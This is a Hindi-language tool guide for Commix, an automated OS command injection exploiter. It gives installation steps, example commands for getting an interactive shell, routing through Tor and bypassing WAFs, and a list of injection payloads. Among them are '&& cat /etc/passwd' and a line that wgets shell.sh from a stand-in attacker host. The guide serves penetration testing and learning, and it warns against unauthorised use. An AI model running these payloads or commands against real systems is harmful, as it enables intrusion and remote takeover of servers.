💻 Commix - Automated Command Injection Tool
💉 Command Injection 🐍 Python 🖥️ RCE
Category: 3️⃣ Web Application Attacks
📝 Description
Commix (CMDi - Command Injection Exploiter) एक ऑटोमेटेड कमांड इंजेक्शन एक्सप्लॉइटेशन टूल है जो Python में लिखा गया है। यह SQLmap की तरह ही काम करता है, लेकिन SQLmap SQL इंजेक्शन के लिए है जबकि Commix कमांड इंजेक्शन (OS Command Injection) वल्नरेबिलिटी को डिटेक्ट और एक्सप्लॉइट करने के लिए है। Commix वेब एप्लीकेशन में उन पैरामीटर्स को ढूँढता है जहाँ यूजर इनपुट को सिस्टम कमांड के रूप में execute किया जा रहा हो, और फिर उस पर कंट्रोल ले सकता है।
विशेषता: Commix पूरी तरह से ऑटोमेटेड है - यह कमांड इंजेक्शन को डिटेक्ट करने से लेकर इंटरएक्टिव शेल प्राप्त करने तक सब कुछ कर सकता है। यह GET, POST, COOKIE, और HEADER पैरामीटर्स पर टेस्ट कर सकता है।
📦 Installation
Kali Linux (पहले से इंस्टॉल):
commix -h
Ubuntu/Debian:
sudo apt update sudo apt install commix -y
GitHub से इंस्टॉल:
git clone https://github.com/commixproject/commix.git cd commix python3 commix.py -h
macOS (Homebrew):
brew install commix
Python pip से:
pip3 install commix
💻 Common Commands (उदाहरण सहित)
📌 Commix की सबसे खास बात है इसकी ऑटोमेशन। नीचे सभी महत्वपूर्ण कमांड्स दिए गए हैं:
🔹 1. बेसिक कमांड इंजेक्शन टेस्ट - GET पैरामीटर:
commix --url "http://target.com/page.php?cmd=ping"
commix --url "http://testphp.vulnweb.com/listproducts.php?cat=1" से cat पैरामीटर पर कमांड इंजेक्शन टेस्ट करता है।🔹 2. POST डेटा पर कमांड इंजेक्शन टेस्ट:
commix --url "http://target.com/login.php" --data="user=admin&pass=123"
🔹 3. कुकी के साथ टेस्ट:
commix --url "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"
🔹 4. यूजर-एजेंट हेडर पर टेस्ट:
commix --url "http://target.com/page.php" --user-agent="test"
🔹 5. इंटरएक्टिव शेल प्राप्त करना:
commix --url "http://target.com/page.php?cmd=ping" --os-shell
🔹 6. सभी पैरामीटर्स पर टेस्ट करना:
commix --url "http://target.com/page.php?id=1&name=test" --all-parameters
🔹 7. बैच मोड (बिना इंटरैक्शन के):
commix --url "http://target.com/page.php?id=1" --batch
🔹 8. रिक्वेस्ट डिले (थ्रॉटल) सेट करना:
commix --url "http://target.com/page.php?id=1" --delay=2
🔹 9. प्रॉक्सी के माध्यम से स्कैन:
commix --url "http://target.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
🔹 10. रैंडम यूजर-एजेंट के साथ स्कैन:
commix --url "http://target.com/page.php?id=1" --random-agent
🔹 11. टॉर्क (Tor) के माध्यम से स्कैन:
commix --url "http://target.com/page.php?id=1" --tor
🔹 12. WAF डिटेक्शन:
commix --url "http://target.com/page.php?id=1" --waf
🔹 13. स्कैन लेवल सेट करना:
commix --url "http://target.com/page.php?id=1" --level=3
🔹 14. कस्टम पेलोड्स के साथ स्कैन:
commix --url "http://target.com/page.php?id=1" --payload="| whoami"
🔹 15. सभी इंजेक्शन टेक्निक्स का उपयोग:
commix --url "http://target.com/page.php?id=1" --technique=ALL
🎯 Commix के कमांड इंजेक्शन टेक्निक्स:
- Classic: ; ls, | whoami, && id
- Eval-based: $(command), `command`, {command}
- Time-based Blind: sleep 5, ping -c 5 127.0.0.1
- DNS-based: nslookup attacker.com, dig attacker.com
- Error-based: सर्वर एरर से डेटा निकालना
🎯 Use Cases (उपयोग के तरीके)
- पेनिट्रेशन टेस्टिंग: वेब एप्लीकेशन में कमांड इंजेक्शन वल्नरेबिलिटी ढूँढना और एक्सप्लॉइट करना।
- बग बाउंटी: टारगेट वेबसाइट पर OS Command Injection ढूँढना।
- RCE (Remote Code Execution): सर्वर पर रिमोट कमांड execute करना।
- शेल प्राप्त करना: इंटरएक्टिव शेल के माध्यम से सर्वर पर पूरा कंट्रोल लेना।
- WAF बायपास: Commix के टैम्पर स्क्रिप्ट्स से WAF को बायपास करना।
⚙️ Key Features (मुख्य विशेषताएँ)
- ✔️ ऑटोमेटेड कमांड इंजेक्शन डिटेक्शन और एक्सप्लॉइटेशन
- ✔️ GET, POST, COOKIE, HEADER, User-Agent पैरामीटर्स पर टेस्ट
- ✔️ इंटरएक्टिव OS शेल प्राप्त करना (--os-shell)
- ✔️ SQLmap जैसा इंटरफेस (SQLmap यूजर्स के लिए आसान)
- ✔️ 5+ इंजेक्शन टेक्निक्स (classic, eval, time-based, DNS-based, error-based)
- ✔️ WAF डिटेक्शन और बायपास
- ✔️ Tor और प्रॉक्सी सपोर्ट
- ✔️ रैंडम यूजर-एजेंट
- ✔️ रिक्वेस्ट थ्रॉटल (Delay)
- ✔️ बैच मोड (--batch) - बिना इंटरैक्शन के चलाना
- ✔️ कस्टम पेलोड्स सपोर्ट
- ✔️ Python में लिखा, क्रॉस-प्लेटफॉर्म
📌 कमांड इंजेक्शन के सामान्य पेलोड्स:
; whoami
| id
|| ls
&& cat /etc/passwd
`hostname`
$(ifconfig)
%0a wget attacker.com/shell.sh
📌 Commix के स्कैन लेवल:
- --level=1: बेसिक पेलोड्स (तेज)
- --level=2: मीडियम पेलोड्स
- --level=3: सभी पेलोड्स और टेक्निक्स (सबसे डीप)
🔗 Official Resources
- Official Website: https://commixproject.com
- GitHub Repository: https://github.com/commixproject/commix
- Documentation: Commix Wiki
- Kali Linux Tools: Kali Commix Page
🔧 Related Tools (समान उपकरण)
- SQLmap: SQL इंजेक्शन के लिए (Commix इसी पर आधारित है)
- OWASP ZAP: कमांड इंजेक्शन सहित कई वल्नरेबिलिटीज स्कैन करता है
- Burp Suite: Intruder से कमांड इंजेक्शन टेस्टिंग
- wfuzz: वेब फजिंग टूल
- ffuf: तेज वेब फजिंग टूल
📌 SQLmap vs Commix:
- SQLmap: SQL इंजेक्शन के लिए - डेटाबेस से डेटा चुराना, टेबल्स डंप करना
- Commix: कमांड इंजेक्शन के लिए - सिस्टम कमांड चलाना, शेल प्राप्त करना
- अनुशंसा: दोनों एक साथ सीखें। SQLmap डेटाबेस के लिए, Commix OS कमांड्स के लिए।
⚠️ Important Note (सावधानी)
Commix एक बेहद शक्तिशाली टूल है जो सर्वर पर रिमोट कमांड execute कर सकता है, फाइलें डिलीट कर सकता है, और पूरा OS शेल प्राप्त कर सकता है। इसका उपयोग केवल उन्हीं वेबसाइट्स पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के कमांड इंजेक्शन एक्सप्लॉइट करना कानूनी अपराध है और इसके गंभीर परिणाम हो सकते हैं। हमेशा अपने खुद के वेब एप्लीकेशन या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें।